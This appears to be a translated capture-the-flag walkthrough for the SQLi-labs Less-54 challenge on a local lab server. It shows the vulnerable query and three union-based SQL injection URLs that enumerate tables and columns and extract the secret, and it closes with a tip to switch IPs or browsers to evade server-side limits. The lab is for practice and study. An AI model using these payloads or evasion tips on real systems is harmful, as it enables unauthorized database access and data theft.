From the start this off, we enter the page-4 Challenges. This is primarily a series of advanced learning, the knowledge learned earlier times deeper use. We examine this off is still the main character injection, but only ten attempts. So it is necessary to think at the time to try. How can reduce the number of less. Here is the table name and password every ten attempts after the mandatory replacement.
This sql statement is off
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
Because the database name is already known challenges, we need to know the name of the table.
http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
Table has been named hcuhv04r8w (though when you're testing should not be this), the next step is to find all the columns in the table
http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='hcuhv04r8w'--+
We got all the columns, you can try all of the data for viewing, here know the password secret_PGN8 column, so we directly see the contents of the column
http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(secret_PGN8) from challenges.hcuhv04r8w--+
The password will be submitted. Page Tip: congrats you nailed it, success.
In fact, among the actual penetration testing, we can use to replace the ip (can be considered a proxy) or replace the browser, etc., depending on what server-side detection limit.